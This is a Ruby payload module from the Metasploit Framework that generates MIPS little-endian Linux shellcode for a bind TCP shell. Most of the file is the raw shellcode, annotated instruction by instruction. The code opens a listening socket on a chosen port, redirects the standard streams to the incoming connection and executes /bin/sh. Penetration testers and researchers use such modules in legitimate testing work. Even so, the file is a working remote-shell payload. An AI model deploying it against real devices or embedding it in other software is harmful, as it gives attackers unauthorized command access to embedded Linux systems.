metasploit-framework/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

	include Msf::Payload::Single
	include Msf::Payload::Linux
	include Msf::Sessions::CommandShellOptions

	def initialize(info = {})
		super(merge_info(info,
			'Name'          => 'Linux Command Shell, Bind TCP Inline',
			'Description'   => 'Listen for a connection and spawn a command shell',
			'Author'        => 'Vlatko Kosturjak',
			'License'       => MSF_LICENSE,
			'Platform'      => 'linux',
			'Arch'          => ARCH_MIPSLE,
			'Handler'       => Msf::Handler::BindTcp,
			'Session'       => Msf::Sessions::CommandShellUnix,
			'Payload'       =>
				{
					'Offsets' => {} ,
					'Payload' => ''
				})
		)
	end

	def generate
		if !datastore['LPORT']
			return super
		end

		port = Integer(datastore['LPORT'])
		port = [port].pack("n").unpack("cc");

		# based on vaicebine at gmail dot com shellcode
		# and scut paper Writing MIPS/Irix shellcode
		shellcode =
		"\xe0\xff\xbd\x27" + #     addiu   sp,sp,-32
		"\xfd\xff\x0e\x24" + #     li      t6,-3
		"\x27\x20\xc0\x01" + #     nor     a0,t6,zero
		"\x27\x28\xc0\x01" + #     nor     a1,t6,zero
		"\xff\xff\x06\x28" + #     slti    a2,zero,-1
		"\x57\x10\x02\x24" + #     li      v0,4183 ( __NR_socket )
		"\x0c\x01\x01\x01" + #     syscall
		"\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)
		"\xff\xff\x50\x30" + #     andi    s0,v0,0xffff
		"\xef\xff\x0e\x24" + #     li      t6,-17
		"\x27\x70\xc0\x01" + #     nor     t6,t6,zero
		port.pack("C2") + "\x0d\x24" +  #     li      t5,0xFFFF (port)
		"\x04\x68\xcd\x01" + #     sllv    t5,t5,t6
		"\xff\xfd\x0e\x24" + #     li      t6,-513
		"\x27\x70\xc0\x01" + #     nor     t6,t6,zero
		"\x25\x68\xae\x01" + #     or      t5,t5,t6
		"\xe0\xff\xad\xaf" + #     sw      t5,-32(sp)
		"\xe4\xff\xa0\xaf" + #     sw      zero,-28(sp)
		"\xe8\xff\xa0\xaf" + #     sw      zero,-24(sp)
		"\xec\xff\xa0\xaf" + #     sw      zero,-20(sp)
		"\x25\x20\x10\x02" + #     or      a0,s0,s0
		"\xef\xff\x0e\x24" + #     li      t6,-17
		"\x27\x30\xc0\x01" + #     nor     a2,t6,zero
		"\xe0\xff\xa5\x23" + #     addi    a1,sp,-32
		"\x49\x10\x02\x24" + #     li      v0,4169 ( __NR_bind )A
		"\x0c\x01\x01\x01" + #     syscall
		"\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)
		"\x25\x20\x10\x02" + #     or      a0,s0,s0
		"\x01\x01\x05\x24" + #     li      a1,257
		"\x4e\x10\x02\x24" + #     li      v0,4174 ( __NR_listen )
		"\x0c\x01\x01\x01" + #     syscall
		"\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)
		"\x25\x20\x10\x02" + #     or      a0,s0,s0
		"\xff\xff\x05\x28" + #     slti    a1,zero,-1
		"\xff\xff\x06\x28" + #     slti    a2,zero,-1
		"\x48\x10\x02\x24" + #     li      v0,4168 ( __NR_accept )
		"\x0c\x01\x01\x01" + #     syscall
		"\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)
		"\xff\xff\x50\x30" + #     andi    s0,v0,0xffff
		"\x25\x20\x10\x02" + #     or      a0,s0,s0
		"\xfd\xff\x0f\x24" + #     li      t7,-3
		"\x27\x28\xe0\x01" + #     nor     a1,t7,zero
		"\xdf\x0f\x02\x24" + #     li      v0,4063 ( __NR_dup2 )
		"\x0c\x01\x01\x01" + #     syscall
		"\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)
		"\x25\x20\x10\x02" + #     or      a0,s0,s0
		"\x01\x01\x05\x28" + #     slti    a1,zero,0x0101
		"\xdf\x0f\x02\x24" + #     li      v0,4063 ( __NR_dup2 )
		"\x0c\x01\x01\x01" + #     syscall
		"\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)
		"\x25\x20\x10\x02" + #     or      a0,s0,s0
		"\xff\xff\x05\x28" + #     slti    a1,zero,-1
		"\xdf\x0f\x02\x24" + #     li      v0,4063 ( __NR_dup2 )
		"\x0c\x01\x01\x01" + #     syscall
		"\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)
		"\x50\x73\x06\x24" + #     li      a2,0x7350
		"\xff\xff\xd0\x04" + # LB: bltzal  a2,LB
		"\x50\x73\x0f\x24" + #     li      t7,0x7350 (nop)
		"\xff\xff\x06\x28" + #     slti    a2,zero,-1
		"\xc7\xff\x0f\x24" + #     li      t7,-57
		"\x27\x78\xe0\x01" + #     nor     t7,t7,zero
		"\x21\x20\xef\x03" + #     addu    a0,ra,t7
		"\xf0\xff\xa4\xaf" + #     sw      a0,-16(sp)
		"\xf4\xff\xa0\xaf" + #     sw      zero,-12(sp)
		"\xf7\xff\x0e\x24" + #     li      t6,-9
		"\x27\x70\xc0\x01" + #     nor     t6,t6,zero
		"\x21\x60\xef\x03" + #     addu    t4,ra,t7
		"\x21\x68\x8e\x01" + #     addu    t5,t4,t6
		"\xff\xff\xa0\xad" + #     sw      zero,-1(t5)
		"\xf0\xff\xa5\x23" + #     addi    a1,sp,-16
		"\xab\x0f\x02\x24" + #     li      v0,4011 ( __NR_execve )
		"\x0c\x01\x01\x01" + #     syscall
		"/bin/sh"
	end

end